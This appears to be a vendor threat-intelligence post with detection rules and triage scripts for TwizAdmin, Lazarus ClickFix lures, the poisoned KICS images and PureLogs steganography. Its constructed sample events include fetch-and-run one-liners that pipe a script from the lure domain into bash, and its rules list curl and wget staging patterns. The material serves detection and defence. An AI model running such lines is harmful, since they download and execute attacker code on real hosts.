
TwizAdmin, Lazarus Mach-O Man & Supply Chain Attacks: OTX Pulse Analysis — Enterprise Detection Pack

Security Arsenal Team
May 24, 2026
6 min read

Threat Summary

Recent OTX pulses indicate a convergence of high-impact credential theft campaigns, supply chain poisoning, and state-sponsored espionage. The landscape is dominated by the DataBreachPlus group deploying the TwizAdmin infostealer and crpx0 ransomware, alongside Lazarus Group utilizing the Mach-O Man malware kit specifically targeting macOS users in the financial sector via Telegram "ClickFix" lures. Simultaneously, a TeamPCP supply chain attack on the official Checkmarx KICS Docker images demonstrates a shift towards compromising trusted developer tooling to harvest infrastructure-as-code credentials. Finally, FrostyNeighbor continues its cyberespionage operations in Eastern Europe using PicassoLoader and Cobalt Strike.

Collectively, these campaigns highlight a pivot towards platform-agnostic payloads (Windows and macOS) and the abuse of trusted delivery mechanisms (Docker Hub, VS Code Marketplace, Telegram) to bypass standard defenses and harvest sensitive credentials, crypto-wallets, and infrastructure secrets.

Threat Actor / Malware Profile

1. TwizAdmin (DataBreachPlus)

  • Distribution: FedEx-themed phishing lures and multi-platform installers.
  • Payload Behavior: A complex operation featuring a clipboard hijacker supporting 8 cryptocurrency chains, BIP-39 seed phrase theft, and browser credential dumping.
  • C2 Communication: Managed via a FastAPI-based panel (port 1337) requiring license keys.
  • Remote Access / Persistence: A bundled Java RAT builder produces the agent used for follow-on access and maintenance once the stealer has run.
  • Access Control / Anti-Analysis: License-key verification gates the panel and payload builds, which also keeps researchers and rival operators from pulling fresh samples.

2. Mach-O Man (Lazarus Group)

  • Distribution: "ClickFix" social engineering via Telegram. Fake meeting invites redirect to typosquatted domains (e.g., livemicrosft.com) impersonating Zoom/Teams.
  • Payload Behavior: Python-based malware (PyLangGhostRAT) targeting macOS. It steals browser data and exfiltrates via Telegram.
  • C2 Communication: C2 rides Telegram's API over TLS, so it blends with legitimate messenger traffic; detection has to come from process lineage and host telemetry rather than from the destination.
  • Initial Access: The victim is coached into pasting a command into Terminal as the "fix" for a fake meeting-client error. There is no exploit to patch; the shell is spawned from the lure app or browser context, which is the detection opportunity.
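The lineage check implied by the ClickFix chain (lure app or browser spawning a shell that downloads and stages a payload), evaluated over constructed macOS process-creation events. This is an added example, not code from the OTX pulse or the Security Arsenal write-up; the field names, application paths and sample events are assumptions for illustration.

```python
# Added example (not code from the OTX pulse or the Security Arsenal write-up):
# evaluates the ClickFix process-lineage logic against constructed macOS
# process-creation events. Field names, paths and sample events are assumed.
import re
from dataclasses import dataclass
from typing import List

# Applications the victim is coached from: Telegram lures and the browser that
# opened the typosquatted "meeting" page.
LURE_PARENTS = ("telegram", "google chrome", "firefox", "safari")
# Interpreters the pasted one-liner lands in. osascript matters because the
# lure may wrap the shell command in AppleScript's "do shell script".
SHELLS = ("/bin/sh", "/bin/bash", "/bin/zsh", "/usr/bin/osascript")
# Download-and-stage markers from the pulse, plus the AppleScript wrapper.
STAGE_RE = re.compile(r"curl|wget|cd /tmp|do shell script", re.IGNORECASE)


@dataclass
class ProcEvent:
    ts: str
    host: str
    parent_image: str
    image: str
    cmdline: str


def is_clickfix(ev: ProcEvent) -> bool:
    """All three conditions must hold: lure parent, shell child, staging command."""
    parent_ok = any(app in ev.parent_image.lower() for app in LURE_PARENTS)
    shell_ok = ev.image.endswith(SHELLS)
    staging = STAGE_RE.search(ev.cmdline) is not None
    return parent_ok and shell_ok and staging


def triage(events: List[ProcEvent]) -> List[ProcEvent]:
    """Return the events worth an analyst's attention, oldest first."""
    return sorted((e for e in events if is_clickfix(e)), key=lambda e: e.ts)


# Constructed telemetry (not real victim data): two true positives, two benign.
SAMPLE_EVENTS = [
    ProcEvent("2026-05-21T14:02:11Z", "mac-fin-07",
              "/Applications/Telegram.app/Contents/MacOS/Telegram", "/bin/zsh",
              "zsh -c 'cd /tmp && curl -fsSL https://livemicrosft.com/fix.sh | bash'"),
    ProcEvent("2026-05-21T14:05:40Z", "mac-fin-12",
              "/Applications/Google Chrome.app/Contents/MacOS/Google Chrome",
              "/usr/bin/osascript",
              "osascript -e 'do shell script \"curl -o /tmp/a https://livemicrosft.com/a\"'"),
    # An admin running the same kind of command from Terminal: no lure parent.
    ProcEvent("2026-05-21T15:00:00Z", "mac-ops-01",
              "/System/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal",
              "/bin/bash", "bash -c 'cd /tmp && curl -O https://example.invalid/tool.tgz'"),
    # Chrome spawning its own helper: the child is not a shell.
    ProcEvent("2026-05-21T15:01:00Z", "mac-fin-12",
              "/Applications/Google Chrome.app/Contents/MacOS/Google Chrome",
              "/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Helpers/Google Chrome Helper.app/Contents/MacOS/Google Chrome Helper",
              "Google Chrome Helper --type=renderer"),
]

if __name__ == "__main__":
    for ev in triage(SAMPLE_EVENTS):
        print(f"[ClickFix] {ev.ts} {ev.host} {ev.parent_image} -> {ev.image}: {ev.cmdline}")
```

The third condition is what keeps the rule from firing on every browser that launches a shell; the osascript branch is there because "do shell script" lets the lure reach the shell without the shell being the direct child of the browser.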

3. KICS Docker Compromise (TeamPCP)

  • Distribution: Poisoned Docker Hub images (v2.1.20, v2.1.21, alpine) and VS Code extensions.
  • Payload Behavior: The mcpAddon.js script trojanizes the KICS binary, encrypting and exfiltrating scan reports containing credentials.
  • Persistence: Rides inside the CI/CD pipeline tooling developers pull, so every scan run re-executes the implant until the image or extension is replaced.

4. PureLogs / PawsRunner

  • Distribution: Phishing emails with TXZ archives containing invoice lures.
  • Payload Behavior: .NET infostealer concealed within PNG files using steganography. PawsRunner decrypts the payload in memory.
  • Execution: PowerShell launched with environment-variable obfuscation (command fragments stored in variables and reassembled at run time), so a static command-line match can miss the final payload.
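A structural triage pass over a PNG carrier, added here as an example (not code from the pulse or the PureLogs dropper): it flags bytes appended after IEND, non-standard or bloated ancillary chunks, bad CRCs, and compressed pixel data that outweighs the raw pixel budget. The sample images are built inline and the thresholds are assumptions. A loader that hides its payload purely in pixel LSBs, which the System.Drawing.Bitmap usage suggests, leaves none of these traces, so a clean result here does not clear the file; it only removes the cheap hiding spots from the list.

```python
# Added example (not code from the pulse or the PureLogs dropper): structural
# triage of a PNG. Thresholds and sample images are assumptions. Pure LSB
# stego that only alters pixel values is NOT detected by these checks.
import struct
import zlib
from typing import List, Tuple

PNG_SIG = b"\x89PNG\r\n\x1a\n"
STANDARD_CHUNKS = {
    b"IHDR", b"PLTE", b"IDAT", b"IEND", b"tEXt", b"zTXt", b"iTXt", b"tRNS",
    b"gAMA", b"cHRM", b"sRGB", b"iCCP", b"bKGD", b"pHYs", b"sBIT", b"hIST",
    b"tIME", b"sPLT", b"eXIf",
}
TEXT_CHUNK_LIMIT = 4096  # assumed: larger metadata chunks deserve a look
CHANNELS = {0: 1, 2: 3, 3: 1, 4: 2, 6: 4}  # PNG colour type -> samples per pixel


def parse_chunks(data: bytes) -> Tuple[List[Tuple[bytes, bytes, bool]], bytes]:
    """Walk chunks up to IEND; return [(type, payload, crc_ok)] and the trailer."""
    if not data.startswith(PNG_SIG):
        raise ValueError("not a PNG")
    pos, chunks = len(PNG_SIG), []
    while pos + 12 <= len(data):
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        payload = data[pos + 8:pos + 8 + length]
        crc_bytes = data[pos + 8 + length:pos + 12 + length]
        if len(payload) < length or len(crc_bytes) < 4:
            chunks.append((ctype, payload, False))  # truncated chunk
            return chunks, b""
        crc_ok = (zlib.crc32(ctype + payload) & 0xFFFFFFFF) == struct.unpack(">I", crc_bytes)[0]
        chunks.append((ctype, payload, crc_ok))
        pos += 12 + length
        if ctype == b"IEND":
            break
    return chunks, data[pos:]


def triage_png(data: bytes) -> List[str]:
    """Return human-readable findings; an empty list means no structural oddity."""
    chunks, trailer = parse_chunks(data)
    findings = []
    if trailer:
        findings.append(f"{len(trailer)} bytes appended after IEND")
    for ctype, payload, crc_ok in chunks:
        name = ctype.decode("latin-1")
        if not crc_ok:
            findings.append(f"bad CRC on {name}")
        if ctype not in STANDARD_CHUNKS:
            findings.append(f"non-standard chunk {name} ({len(payload)} bytes)")
        elif ctype in (b"tEXt", b"zTXt", b"iTXt") and len(payload) > TEXT_CHUNK_LIMIT:
            findings.append(f"oversized {name} chunk ({len(payload)} bytes)")
    # Compressed pixel data should not dwarf the raw pixel size.
    ihdr = next((p for t, p, _ in chunks if t == b"IHDR"), None)
    if ihdr and len(ihdr) >= 10:
        width, height, depth, colour = struct.unpack(">IIBB", ihdr[:10])
        raw = height * (1 + (width * CHANNELS.get(colour, 1) * depth + 7) // 8)
        idat = sum(len(p) for t, p, _ in chunks if t == b"IDAT")
        if idat > raw + 1024:
            findings.append(f"IDAT ({idat} bytes) larger than raw pixel budget ({raw} bytes)")
    return findings


# --- constructed samples ----------------------------------------------------
def _chunk(ctype: bytes, payload: bytes) -> bytes:
    crc = zlib.crc32(ctype + payload) & 0xFFFFFFFF
    return struct.pack(">I", len(payload)) + ctype + payload + struct.pack(">I", crc)


def build_png(extra_chunks=(), trailer: bytes = b"") -> bytes:
    """1x1 8-bit greyscale PNG with optional extra chunks and trailing bytes."""
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 0, 0, 0, 0)
    idat = zlib.compress(b"\x00\x00")  # filter byte + one pixel
    body = _chunk(b"IHDR", ihdr) + _chunk(b"IDAT", idat)
    for ctype, payload in extra_chunks:
        body += _chunk(ctype, payload)
    return PNG_SIG + body + _chunk(b"IEND", b"") + trailer


CLEAN_PNG = build_png()
# Stand-in for a carrier image: a private chunk plus a blob appended after IEND.
STEGO_PNG = build_png(extra_chunks=[(b"stEG", b"MZ" + b"\x00" * 300)], trailer=b"PAYLOAD" * 64)

if __name__ == "__main__":
    for label, img in (("clean", CLEAN_PNG), ("stego", STEGO_PNG)):
        print(label, triage_png(img) or "no structural findings")
```

Run it over the PNGs referenced by a flagged PowerShell command line; anything with a trailer or a private chunk goes straight to sandboxing, while a file that comes back clean still needs pixel-level inspection before it is dismissed.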

IOC Analysis

The provided IOCs span multiple categories requiring different operational postures:

  • File hashes (SHA256/MD5/SHA1): A significant volume of hashes (TwizAdmin, Mach-O Man, KICS) is provided. Import them into EDR immediately for quarantine/remediation, but treat them as a point-in-time control: a rebuilt sample changes its hash, so the behavioural rules below are the durable detection.
  • Domains (typosquatting and C2): Indicators like livemicrosft.com (Lazarus) and fanonlyatn.xyz (TwizAdmin) represent phishing infrastructure and C2. Block them at the DNS layer and route them to a sinkhole so that any later resolution attempt identifies the host that tried.
  • Network infrastructure: FrostyNeighbor rotates through short-lived .icu domains (e.g., alexavegas.icu) with randomized subdomains, which points to algorithmically generated names or fast-flux hosting. A static blocklist ages out quickly here; detection has to come from DNS analytics (newly seen domains, per-host fan-out across many .icu names, NXDOMAIN bursts) rather than simple blocking.
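The DNS analytics the FrostyNeighbor infrastructure calls for, as an added example that is not part of the pulse or the original article: it scores each client host on how many distinct .icu registered domains it touched, how many subdomain labels look machine-generated, and how many lookups came back NXDOMAIN. The resolver log layout (timestamp, client host, qname, qtype, rcode), the entropy threshold and the scoring weights are assumptions to tune against your own data; the log lines are constructed.

```python
# Added example (not code from the pulse): score hosts by FrostyNeighbor-style
# .icu activity over constructed resolver log lines. Log layout, entropy
# threshold and scoring weights are assumptions.
import math
from collections import defaultdict
from typing import Dict, List, Optional, Tuple

# Constructed sample log: "<timestamp> <client host> <qname> <qtype> <rcode>"
SAMPLE_DNS_LOG = """\
2026-05-20T08:01:12Z ws-042 alexavegas.icu A NOERROR
2026-05-20T08:01:13Z ws-042 q7x9k2.alexavegas.icu A NOERROR
2026-05-20T08:01:14Z ws-042 m3p0zt.alexavegas.icu A NOERROR
2026-05-20T08:01:15Z ws-042 needbinding.icu A NXDOMAIN
2026-05-20T08:01:16Z ws-042 v8r2wq.needbinding.icu A NOERROR
2026-05-20T08:01:17Z ws-042 algsat.icu A NOERROR
2026-05-20T09:10:00Z ws-017 www.example.com A NOERROR
2026-05-20T09:10:01Z ws-017 mail.example.com A NOERROR
2026-05-20T09:12:44Z ws-017 shop.icu A NOERROR
"""


def label_entropy(label: str) -> float:
    """Shannon entropy in bits per character of one DNS label."""
    if not label:
        return 0.0
    counts: Dict[str, int] = defaultdict(int)
    for ch in label:
        counts[ch] += 1
    n = len(label)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def looks_generated(label: str) -> bool:
    """Assumed heuristic: at least six chars, high entropy, mixed letters and digits."""
    return (len(label) >= 6 and label_entropy(label) >= 2.5
            and any(ch.isdigit() for ch in label) and any(ch.isalpha() for ch in label))


def parse_line(line: str) -> Optional[Tuple[str, str, str, str, str]]:
    parts = line.split()
    return (parts[0], parts[1], parts[2], parts[3], parts[4]) if len(parts) == 5 else None


def score_hosts(log_text: str, tld: str = ".icu") -> List[Tuple[str, int, List[str]]]:
    """Per client host: distinct registered domains under the TLD, generated-looking
    subdomain labels and NXDOMAIN answers, summed into a simple score."""
    stats: Dict[str, dict] = defaultdict(lambda: {"domains": set(), "generated": 0, "nxdomain": 0})
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        _, host, qname, _, rcode = rec
        qname = qname.lower().rstrip(".")
        if not qname.endswith(tld):
            continue
        labels = qname.split(".")
        st = stats[host]
        st["domains"].add(".".join(labels[-2:]))  # registered domain under the TLD
        if len(labels) > 2 and looks_generated(labels[0]):
            st["generated"] += 1
        if rcode == "NXDOMAIN":
            st["nxdomain"] += 1
    ranked = []
    for host, st in stats.items():
        score = len(st["domains"]) + st["generated"] + st["nxdomain"]
        # One ordinary .icu lookup is not interesting; fan-out or generated labels are.
        if len(st["domains"]) >= 2 or st["generated"]:
            ranked.append((host, score, sorted(st["domains"])))
    return sorted(ranked, key=lambda r: -r[1])


if __name__ == "__main__":
    for host, score, domains in score_hosts(SAMPLE_DNS_LOG):
        print(f"{host}: score={score} domains={domains}")
```

The host that fans out across several .icu domains with random-looking labels rises to the top, while the host with a single lookup of a legitimate-looking .icu site stays out of the queue. The known labels from the pulse still belong in a match list; the scoring is what catches the next batch of domains the blocklist has not seen.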

Detection Engineering

```yaml
title: Suspicious PowerShell PNG Access (PureLogs PawsRunner)
id: 3c7b6f8a-1d9e-4f5a-b2c3-0e9f8a7b6c5d
description: Detects PowerShell referencing a PNG file together with in-memory bitmap, stream or Base64 handling, consistent with steganographic payload extraction as seen in PureLogs/PawsRunner campaigns. Encoded commands hide these strings; pair with script block logging.
status: experimental
date: 2026-05-24
author: Security Arsenal
references:
    - https://otx.alienvault.com/pulse/6427349f8a1b4c9f8d7e6f5a
logsource:
    product: windows
    category: process_creation
detection:
    selection_img:
        Image|endswith:
            - '\powershell.exe'
            - '\pwsh.exe'
    selection_png:
        CommandLine|contains: '.png'
    selection_api:
        CommandLine|contains:
            - 'System.Drawing.Bitmap'
            - 'System.IO.MemoryStream'
            - 'FromBase64String'
    condition: all of selection_*
falsepositives:
    - Legitimate image-processing or build scripts that load PNGs from PowerShell
level: high
tags:
    - attack.defense_evasion
    - attack.t1027.003
    - attack.execution
    - attack.t1059.001
---
title: macOS Fake Collaboration Tool Execution (Mach-O Man)
id: 9d8e7f6a-5b4c-4a3d-9e1f-2c3b4a5d6e7f
description: Detects a shell or osascript process spawned by Telegram or a browser with a download-and-stage command line, the execution pattern of Lazarus Group Mach-O Man ClickFix lures.
status: experimental
date: 2026-05-24
author: Security Arsenal
references:
    - https://otx.alienvault.com/pulse/6427349f8a1b4c9f8d7e6f5b
logsource:
    product: macos
    category: process_creation
detection:
    selection_parent:
        ParentImage|contains:
            - 'Telegram'
            - 'Chrome'
            - 'Firefox'
            - 'Safari'
    selection_child:
        Image|endswith:
            - '/bin/sh'
            - '/bin/bash'
            - '/bin/zsh'
            - '/usr/bin/osascript'
    selection_cmd:
        CommandLine|contains:
            - 'curl'
            - 'wget'
            - 'cd /tmp'
    condition: all of selection_*
falsepositives:
    - Administrative troubleshooting via terminal
    - Browser-launched helper scripts that fetch updates
level: high
tags:
    - attack.execution
    - attack.t1204.004
    - attack.t1059.004
---
title: TwizAdmin C2 Network Activity
id: a1b2c3d4-5e6f-7a8b-9c0d-1e2f3a4b5c6d
description: Detects outbound connections to known TwizAdmin C2 infrastructure. The port-only selection surfaces FastAPI panels on the actor's preferred port 1337 and is meant for hunting rather than blocking.
status: experimental
date: 2026-05-24
author: Security Arsenal
references:
    - https://otx.alienvault.com/pulse/6427349f8a1b4c9f8d7e6f5a
logsource:
    product: windows
    category: network_connection
detection:
    selection_ip:
        Initiated: 'true'
        DestinationIp: '103.241.66.238'
    selection_domain:
        Initiated: 'true'
        DestinationHostname|endswith: 'fanonlyatn.xyz'
    selection_port:
        Initiated: 'true'
        DestinationPort: 1337
    condition: 1 of selection_*
falsepositives:
    - Internal development or game servers listening on TCP 1337 (port-only hits)
level: high
tags:
    - attack.command_and_control
    - attack.t1071.001
```


```kql
// Hunt for FrostyNeighbor domains (FrostyNeighbor pulse)
DeviceNetworkEvents
| where Timestamp > ago(7d)
| where RemoteUrl endswith ".icu"
| where RemoteUrl has_any ("alexavegas", "needbinding", "algsat")
| project Timestamp, DeviceName, InitiatingProcessFileName, RemoteUrl, RemoteIP

// Hunt for PureLogs/PawsRunner execution (PureLogs pulse)
// FileName is the PowerShell process itself; InitiatingProcessFileName is its parent.
// -EncodedCommand hides these strings; pair with script block logging (Event ID 4104).
DeviceProcessEvents
| where Timestamp > ago(7d)
| where FileName in~ ("powershell.exe", "pwsh.exe")
| where ProcessCommandLine contains ".png"
    and ProcessCommandLine has_any ("FromBase64String", "MemoryStream", "Bitmap")
| project Timestamp, DeviceName, AccountName, ProcessCommandLine, InitiatingProcessFileName
```


```powershell
# IOC hunt script for TwizAdmin and Mach-O Man hashes
# Requires administrative privileges to read every path.
# Note: the Mach-O Man samples are macOS binaries; on a Windows host they will
# only turn up in mail stores, download folders or file shares, not as running code.

$TargetHashes = @(
    "06299676b43749b8477c4bc977c09512957fc9b66fd5030c1874069632ce6092", # TwizAdmin
    "3fcd267e811d9b83cafa3d8d6932fa1c56f4fd8dcf46f9ec346e0689439532d4", # TwizAdmin
    "584796212f99efc7ac765d6048913fe34e46a64b13a8a78fb3a465b8c61f3527", # TwizAdmin
    "0f41fd82cac71e27c36eb90c0bf305d6006b4f3d59e8ba55faeacbe62aadef90", # Mach-O Man
    "24af069b8899893cfc7347a4e5b46d717d77994a4b140d58de0be029dba686c9"  # Mach-O Man
)

$DrivesToScan = @("C:\", "D:\")
$MaxSizeBytes = 200MB   # skip very large files; the samples are far smaller
$MatchesFound = [System.Collections.Generic.List[object]]::new()

Write-Host "[+] Starting hunt for known TwizAdmin and Mach-O Man hashes..." -ForegroundColor Cyan

foreach ($Drive in $DrivesToScan) {
    if (-not (Test-Path $Drive)) { continue }
    Write-Host "[+] Scanning $Drive..." -ForegroundColor Yellow
    # Stream files through the pipeline instead of materialising the whole tree first.
    Get-ChildItem -Path $Drive -Recurse -File -Force -ErrorAction SilentlyContinue |
        Where-Object { $_.Length -le $MaxSizeBytes } |
        ForEach-Object {
            # -LiteralPath avoids wildcard interpretation of odd file names.
            $Hash = (Get-FileHash -LiteralPath $_.FullName -Algorithm SHA256 -ErrorAction SilentlyContinue).Hash
            # -in compares case-insensitively, so upper-case output matches the lower-case list.
            if ($Hash -and $Hash -in $TargetHashes) {
                $MatchesFound.Add([PSCustomObject]@{
                    FilePath = $_.FullName
                    Hash     = $Hash
                    Detected = (Get-Date)
                })
            }
        }
}

if ($MatchesFound.Count -gt 0) {
    Write-Host "[!] THREAT DETECTED: Found $($MatchesFound.Count) matching files." -ForegroundColor Red
    $MatchesFound | Format-Table -AutoSize
    exit 1   # non-zero exit so EDR live response or RMM orchestration can act on it
} else {
    Write-Host "[+] No matching files found." -ForegroundColor Green
}
```

Response Priorities

  • Immediate (0-4h):
    • Block all domains and IOCs associated with TwizAdmin (fanonlyatn.xyz, 103.241.66.238) and Lazarus (livemicrosft.com) at DNS and at the egress proxy.
    • Quarantine any devices matching the provided file hashes.
    • Identify and pull all Checkmarx KICS Docker images (tags v2.1.20, v2.1.21, alpine) and the affected VS Code extension versions (v1.17.0, v1.19.0) immediately. Treat every secret that appeared in a scan report produced by those builds as compromised and rotate it, then re-scan infrastructure for exposed credentials with a clean scanner.
  • 24 Hours:
    • Initiate credential resets for accounts used on devices potentially infected by TwizAdmin or Mach-O Man, starting with crypto wallets and banking/finance credentials. A stolen BIP-39 seed phrase cannot be reset; funds have to move to a freshly generated wallet.
    • Review network logs for connections to the .icu domains linked to FrostyNeighbor.
  • 1 Week:
    • Architecture hardening: allow-list container registries and pin images by digest rather than mutable tag, and enforce SBOM (Software Bill of Materials) scanning in every CI/CD pipeline so a poisoned upstream image cannot be ingested silently.
    • Awareness: Update security awareness training to cover macOS "ClickFix" lures and the risk of pasting terminal commands prompted by collaboration apps or meeting invites.
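A check for the KICS response steps above (find references to the poisoned image tags, and find unpinned image references that would let a re-poisoned tag back in), as an added example that is not code from the pulse or from Checkmarx. The sample manifests are constructed; the regex, the file set and the v2.1.19 tag in the workflow are assumptions for illustration and say nothing about which other tags are safe.

```python
# Added example (not from the pulse or Checkmarx): scan CI manifests and
# Dockerfiles for the poisoned KICS tags and for unpinned image references.
# Sample files are constructed; the v2.1.19 tag is an assumed placeholder.
import re
from typing import Dict, List

AFFECTED_TAGS = {"v2.1.20", "v2.1.21", "alpine"}  # from the pulse

# Matches docker.io/checkmarx/kics, ghcr.io/.../checkmarx/kics and bare
# checkmarx/kics, with optional :tag and @sha256 digest. The lookahead keeps
# "checkmarx/kics-github-action" (a different artifact) out of the match.
IMAGE_RE = re.compile(
    r"(?:[\w.\-]+/)*checkmarx/kics(?![\w\-])"
    r"(?::(?P<tag>[\w.\-]+))?"
    r"(?:@(?P<digest>sha256:[0-9a-f]{64}))?"
)


def scan_text(path: str, text: str) -> List[dict]:
    """One finding per image reference: affected, unpinned or pinned."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        for m in IMAGE_RE.finditer(line):
            tag, digest = m.group("tag"), m.group("digest")
            if tag in AFFECTED_TAGS:
                status = "affected"
                reason = f"tag {tag} is in the poisoned set; pull and replace, rotate scanned secrets"
            elif digest is None:
                status = "unpinned"
                reason = f"tag {tag or 'latest'} is mutable; pin to a digest you have verified"
            else:
                status = "pinned"
                reason = "digest-pinned; confirm the digest against the vendor advisory"
            findings.append({"path": path, "line": lineno, "ref": m.group(0),
                             "status": status, "reason": reason})
    return findings


def scan_files(files: Dict[str, str]) -> List[dict]:
    out: List[dict] = []
    for path, text in files.items():
        out.extend(scan_text(path, text))
    return out


# Constructed repository snippets (not real project files).
SAMPLE_FILES = {
    "ci/Dockerfile": "FROM checkmarx/kics:v2.1.21\nCOPY . /path\n",
    "docker-compose.yml": "services:\n  kics:\n    image: docker.io/checkmarx/kics:alpine\n",
    ".github/workflows/iac.yml": (
        "jobs:\n  scan:\n    runs-on: ubuntu-latest\n"
        "    container: checkmarx/kics:v2.1.19@sha256:" + "a" * 64 + "\n"
        "    steps:\n      - uses: checkmarx/kics-github-action@v2.1.19\n"
    ),
    "Makefile": "scan:\n\tdocker run --rm -v $(PWD):/path checkmarx/kics scan -p /path\n",
}

if __name__ == "__main__":
    for f in scan_files(SAMPLE_FILES):
        print(f"{f['status']:9} {f['path']}:{f['line']} {f['ref']}: {f['reason']}")
```

Run it across every repository that can reach production; an "unpinned" hit is the structural problem the one-week hardening item is about, since a tag-only reference offers no way to notice a silently replaced image.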

Tags: darkweb, otx-pulse, darkweb-credentials, infostealer, supply-chain, macos-malware, cyberespionage, ransomware
TwizAdmin, Lazarus Mach-O Man & Supply Chain Attacks: OTX Pulse Analysis — Enterprise Detection Pack | Security Arsenal | Security Arsenal